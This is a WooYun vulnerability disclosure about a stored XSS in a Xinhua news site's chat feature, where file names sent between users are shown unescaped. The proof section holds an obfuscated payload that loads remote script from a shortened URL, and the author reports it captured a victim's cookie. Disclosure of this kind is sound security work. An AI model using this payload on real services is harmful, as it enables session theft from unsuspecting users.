当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-079275

漏洞标题:新华网炫聊跨客户端通讯存储型XSS一枚

相关厂商:news.cn

漏洞作者: Kieran

提交时间:2014-10-14 12:15

修复时间:2014-11-28 12:16

公开时间:2014-11-28 12:16

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:7

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-14: 细节已通知厂商并且等待厂商处理中
2014-10-17: 厂商已经确认,细节仅向厂商公开
2014-10-27: 细节向核心白帽子及相关领域专家公开
2014-11-06: 细节向普通白帽子公开
2014-11-16: 细节向实习白帽子公开
2014-11-28: 细节向公众公开

简要描述:

炫聊!我聊我聊我聊聊!
XSS !我X 我X 我XXX !
跟人聊天冷不防的发给对方一个XSS,是不是很有趣?
可定向攻击

详细说明:

大家都知道,在Unix和Linux下文件名中是允许带 < > 的,于是由此引发的跨客户端XSS是屡屡发生
比如某网站发图时图片名是引用它本来的名字并且没有转义的话,基本传上去就会触发XSS
本次的漏洞也是这样的情况
漏洞网址:
http://my.xuan.news.cn/main.do
登陆后右下角有炫聊功能,我自己注册了两个号互加好友聊天测试了下
发现互相发图片,文件时,文件名直接输出,没有转义,直接触发XSS
查看聊天记录时继续触发

漏洞证明:

先测试了下
构造图片名称如下:

1013225340.jpg


发送给好友后直接弹窗

13225141.jpg


好~测试完毕
接着构造一个xss.me的fishing文件名如下

"><img src="1"onerror="window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,116,46,99,110,47,82,55,90,55,116,69,99);document.body.appendChild(window.s)">


14002217.jpg


发给好友后马上在xss平台收到了Cookie

013235842.jpg

修复方案:

转义过滤
你们更懂

版权声明:转载请注明来源 Kieran@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2014-10-17 15:40

厂商回复:

最新状态:

暂无